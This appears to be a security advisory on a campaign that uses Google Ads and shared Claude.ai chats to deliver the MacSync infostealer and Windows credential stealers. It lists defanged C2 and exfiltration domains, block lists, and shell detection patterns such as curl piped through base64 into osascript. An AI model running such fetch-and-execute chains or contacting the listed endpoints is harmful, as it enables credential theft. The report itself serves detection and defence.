Fake Claude Code Install Guide Hides MacSync Infostealer in Active Google Ads Campaign
| Group | Attribution unconfirmed; compromised Malaysian company's Google Ads account used as delivery infrastructure proxy |
| Type | Malvertising / ClickFix Infostealer Campaign — cross-platform macOS and Windows |
| Malware | MacSync — macOS Malware as a Service infostealer targeting browser credentials, Keychain databases, session cookies, and cryptocurrency wallets; Trojan.Stealer.GJ / Trojan.Stealer.GK — Windows credential stealers delivered via mshta.exe; Mach-O reverse shell (second macOS campaign cluster) |
| Score | 🟠 8.5 High. Active cross-platform campaign with 15,600+ confirmed victims, novel abuse of legitimate AI shared chat infrastructure as malware hosting, polymorphic delivery resisting hash-based detection, and ongoing credential exfiltration at scale. |
| Observed | May 2026, BleepingComputer, Bitdefender, Trend Micro, Anvilogic, Malwarebytes |
Overview
An active malvertising campaign discovered on 11 May 2026 is weaponising Google Ads and legitimate Claude.ai shared chats to deliver the MacSync infostealer to macOS users, with a parallel Windows attack chain distributing credential-stealing trojans through fake Claude Code documentation pages. Security researcher Berk Albayrak of Trendyol Group flagged the first attack cluster; BleepingComputer independently confirmed a second cluster operating on entirely separate infrastructure and running the same technique.
The campaign exploits a trust gap created by AI platforms that allow public content sharing. The malicious installation instructions are hosted on claude.ai itself, meaning there is no fake URL for security-aware users to detect, no lookalike domain, and no certificate warning. Victims land on a legitimate claude.ai shared chat attributed to "Apple Support" that presents itself as an official Claude Code installation guide for Mac, after clicking what appears to be a valid Google Ad pointing to the real claude.ai domain.
MacSync operates as a Malware as a Service platform leased to multiple threat actors. The variant deployed in this campaign harvests browser saved credentials, cookies, macOS Keychain contents, and cryptocurrency wallet seed phrases, packages the collected data as /tmp/osalogging.zip, and exfiltrates the bundle via HTTP POST to the operator's command-and-control gate endpoint. A polymorphic server generates a uniquely obfuscated payload on every request, limiting the reliability of signature and hash-based detection across both EDR and antivirus tooling.
Bitdefender confirms a Windows-specific attack vector running in parallel, where a Squarespace-hosted page mirrors the official Claude Code documentation layout and uses the same ClickFix social engineering technique to execute a remotely hosted HTA file via mshta.exe. The Windows payloads are detected by Bitdefender as Trojan.Stealer.GJ, Trojan.Stealer.GK, IL:Trojan.MSILZilla.245316, and Gen:Variant.Barys.509034. More than 15,600 victims have been documented publicly across both campaigns as of 11 May 2026.
Key Details
Delivery Method – Google Ads malvertising combined with ClickFix social engineering via legitimate Claude.ai shared chats on macOS, and Squarespace-hosted fake Claude Code documentation pages on Windows
Target – macOS users searching for Claude or Claude Code downloads; Windows users visiting fake Claude Code documentation sites; broad cross-platform targeting with no specific industry vertical; Russian and CIS-region keyboard locales are excluded via locale check, suggesting the threat actors are deliberately avoiding that geographic region
Functions
- Harvests browser saved credentials and autofill data across all major browsers
- Extracts macOS Keychain databases containing stored passwords, certificates, and secure notes
- Steals cryptocurrency wallet seed phrases and private key material
- Captures live session cookies, enabling account takeover without requiring password re-entry
- Delivers locale-aware payload that silently exits on machines configured with a Russian or CIS-region keyboard layout
- Second macOS variant delivers a Mach-O reverse shell providing interactive terminal access via /bin/bash or /bin/zsh
- Packages exfiltrated data as /tmp/osalogging.zip and HTTP POSTs to the attacker C2 gate
Obfuscation – Base64-encoded Terminal commands conceal the true payload download URL from casual inspection; server-side polymorphic delivery generates a uniquely obfuscated payload variant per request; fileless execution via in-memory script pipeline (curl piped to base64 decode piped to osascript) leaves no persistent executable written to disk
Attack Vectors
Stage 1 — Ad Placement: Attackers purchase Google Ads targeting search queries including "Claude mac download" and "download claude code". The ads display claude.ai as the destination URL and appear legitimate in both the ad label and the browser address bar following redirect. The advertiser identity used to place the ads belongs to a real Malaysian company whose Google Ads account was compromised by the threat actors and used as a proxy for ad placement; the account has since been deactivated by Google.
Stage 2 — Lure Delivery: Victims arrive at a publicly shared Claude.ai chat that presents itself as an official "Claude Code on Mac" installation guide attributed to "Apple Support" within the chat interface. The chat walks users through opening Terminal and pasting a command. Because the content is hosted on claude.ai, there are no domain anomalies, no TLS certificate warnings, and no indicators that trained users would act on through standard URL verification. A parallel Windows vector directs victims to a Squarespace-hosted page that duplicates the layout, navigation structure, and styling of the official Claude Code documentation site.
Stage 3 — ClickFix Execution: The Terminal command is base64-encoded to conceal the payload download URL. Execution pulls a loader shell script from attacker-controlled infrastructure and runs it in memory. The script first profiles the victim system, collects external IP address, hostname, OS version, and keyboard locale, then silently aborts on Russian or CIS-region keyboard configurations. On Windows, the ClickFix instruction abuses mshta.exe — a legitimate Microsoft HTML Application host binary — to fetch and execute a remotely hosted HTA file, which in turn downloads secondary stealer payloads and invokes PowerShell to modify Windows Defender settings.
Stage 4 — Payload Execution and Exfiltration: The macOS loader pulls a second-stage payload and executes it through osascript, macOS's built-in AppleScript engine. MacSync runs entirely in memory, sweeps Keychain databases, browser credential stores, cookies, and cryptocurrency wallet files, then packages the data as /tmp/osalogging.zip and exfiltrates it via HTTP POST to a2abotnet[.]com/gate. A second macOS variant delivers a Mach-O Mach object binary reverse shell, giving the operator interactive command execution on the compromised machine. The Windows stealer components perform equivalent credential harvesting from Windows Credential Manager and browser stores before exfiltrating to claude-code.official-version[.]com.
Known Indicators of Compromise
Indicators may vary across campaigns and malware samples. Verify all IOCs against current threat feeds before actioning.
File Hashes
| Indicator | Type | Notes |
|---|---|---|
bbd98170ea66c8d13605cb88ad0e18602ef40c0745f7b2c979a8a342a31c1857 | SHA-256 | Primary macOS MacSync payload — confirmed by BleepingComputer and Anvilogic |
C2 Domains and Exfiltration Infrastructure
| Indicator | Type | Associated Use |
|---|---|---|
a2abotnet[.]com | C2 Domain | macOS MacSync command-and-control |
a2abotnet[.]com/gate | Exfiltration Endpoint | HTTP POST destination for archived stolen credential bundle |
claude-code.official-version[.]com | C2 Domain | Windows stealer command-and-control |
customroofingcontractors[.]com | Payload Delivery Domain | Malicious loader and payload hosting |
briskinternet[.]com | Infrastructure Domain | Second confirmed campaign cluster |
File Artefacts
| Indicator | Type | Notes |
|---|---|---|
/tmp/osalogging.zip | Staged Exfiltration Archive | Data staging archive created prior to HTTP POST exfiltration |
Windows Process Chain Indicators
| Indicator | Type | Notes |
|---|---|---|
Code.exe → powershell.exe → mshta.exe [remote URL] | Suspicious Process Chain | Windows attack chain execution signature |
macOS Behavioural Indicators
| Indicator | Type | Notes |
|---|---|---|
curl | base64 -d | osascript | Shell Command Pattern | Fileless MacSync execution chain in Terminal |
osascript spawned following curl or base64 decode | Process Behaviour | MacSync stage-two payload execution signature |
curl | base64 -d | gunzip | Shell Command Pattern | Alternate delivery variant observed in campaign |
MITRE ATT&CK Techniques
| Technique ID | Technique Name | Application in This Campaign |
|---|---|---|
| T1566.002 | Phishing via Spearphishing Link | Google Ads redirect victims to malicious Claude.ai shared chats and Squarespace fake documentation pages |
| T1059.002 | Command and Scripting Interpreter: AppleScript | osascript executes the second-stage MacSync payload in memory on macOS |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Windows attack chain invokes PowerShell to modify Defender settings and download stealer payloads |
| T1218.005 | System Binary Proxy Execution: Mshta | mshta.exe fetches and executes a remotely hosted HTA file on Windows, bypassing application allow-list controls |
| T1140 | Deobfuscate/Decode Files or Information | Base64 encoding conceals the payload download URL inside the Terminal command shown to macOS victims |
| T1555.001 | Credentials from Password Stores: Keychain | MacSync targets macOS Keychain databases to extract all stored credentials |
| T1555.003 | Credentials from Web Browsers | Browser saved passwords, autofill entries, and live session cookies are harvested across all major browsers |
| T1041 | Exfiltration over C2 Channel | Credential archive POSTed to hxxp://a2abotnet[.]com/gate via HTTP |
Mitigation and Prevention
Block Confirmed Campaign Domains at the Perimeter
Add a2abotnet[.]com, claude-code.official-version[.]com, customroofingcontractors[.]com, and briskinternet[.]com to DNS blocklists and web proxy deny lists immediately. Monitoring for outbound HTTP POST connections to a2abotnet[.]com/gate is particularly high priority, as this is the active exfiltration endpoint and any connection to it indicates an already-compromised host.
Restrict mshta.exe from Executing Remote Content on Windows
The Windows attack chain depends on mshta.exe being permitted to fetch and run remotely hosted HTA content. Block this behaviour via AppLocker or Windows Defender Application Control policies. Where mshta.exe has no legitimate operational use in your environment, consider blocking the binary entirely rather than restricting its network access alone.
Deploy Behavioural Detection for macOS Fileless Execution
MacSync produces no persistent on-disk executable and uses server-side polymorphic payload generation to defeat hash-based signatures. EDR rules should alert on the osascript process being spawned as a child of shell processes that have executed curl or base64 decode operations. Monitor specifically for curl | base64 -d | osascript and curl | base64 -d | gunzip command patterns in Terminal and iTerm2.
Treat Any Non-Official Claude Installation as a Compromise Indicator
No legitimate Claude or Claude Code installation flow instructs users to paste a Terminal command obtained from a Google search result, a shared chat, or any documentation page other than docs.anthropic.com. Any user in your environment who installed Claude software from a non-official source in the past 30 days should be assessed as a potential MacSync infection and their credentials treated as compromised.
Rotate Credentials and Audit Keychain Access on Affected Machines
For any user assessed as potentially exposed, rotate all browser-stored credentials, revoke live session tokens for corporate SaaS applications and email, and audit macOS Keychain contents for signs of unauthorised access. Cryptocurrency wallet seed phrases should be treated as fully compromised and wallet migration considered. Session cookie theft from this campaign enables account access without passwords, meaning password resets alone are insufficient without also invalidating active sessions.
Update Security Awareness Training for AI Platform Trust
Train users and helpdesk staff that a URL pointing to a legitimate AI platform such as claude.ai or chatgpt.com does not guarantee the safety of the content hosted at that URL. Shared content features on AI platforms are user-generated and unmoderated for malware intent. Legitimate software documentation never requires copying and pasting Terminal commands from a shared AI chat.
Audit Google Ads Account Access Across the Organisation
This campaign used a compromised legitimate advertiser's Google Ads account to place malicious ads that appeared credible to both users and Google's ad review systems. Review MFA status and access controls on any Google Ads accounts held by the organisation, and set up alerts for unusual ad creation or billing activity. Compromised advertiser accounts are increasingly used as trusted launch pads for malvertising because they pass baseline platform legitimacy checks.
Risk Assessment
The abuse of legitimate AI shared content features as malware staging infrastructure is a direct evolution of the ClickFix technique, and it removes most of the detection signals that security awareness training teaches users to look for. Prior ClickFix campaigns relied on lookalike domains, compromised websites, or fake documentation pages that forensically-minded users could sometimes identify. Hosting malicious instructions inside a genuine claude.ai shared chat collapses that detection layer entirely. The combination of a valid Google Ad, a valid claude.ai URL, and a plausible Apple Support attribution inside the shared chat presents a threat model that most enterprise users and many security professionals would not flag as suspicious without specific knowledge of this campaign.
The 15,600+ victim count, confirmed across only two independently identified campaign clusters, almost certainly represents a fraction of actual infections. MacSync is a leased MaaS platform available to multiple threat actors, and the two infrastructure clusters observed operating this technique are likely not the only groups using it. The locale exclusion of Russian and CIS-region keyboard configurations is a consistent pattern seen in financially motivated Eastern European threat actors who use it to avoid compromising domestic users and drawing attention from local law enforcement, though formal attribution remains unconfirmed.
Exfiltrated Keychain and browser session data represents severe downstream risk in corporate environments. Harvested session cookies bypass MFA on applications that do not implement short token expiry or device-binding. A single compromised developer machine with cloud provider credentials in the browser or Keychain can expose broader infrastructure. The reverse shell variant observed in the second campaign cluster escalates the threat from credential theft to full persistent access, potentially transforming a single endpoint infection into a network intrusion.
Conclusion
Any macOS or Windows user who searched for Claude or Claude Code in the past two weeks and followed Terminal or command-line instructions from a Google search result or a shared chat should be assessed as potentially compromised and their credentials rotated across all browser-stored accounts immediately. Standard URL verification provides no protection in this campaign because attackers used the real claude.ai domain for payload delivery.
This campaign marks a clear signal that AI platform shared content features are now being incorporated into malware delivery infrastructure as trusted staging layers. The same technique is applicable to any AI platform with publicly shareable chat or artefact URLs, and defenders should expect it to be replicated against other platforms and with different malware payloads in the coming weeks.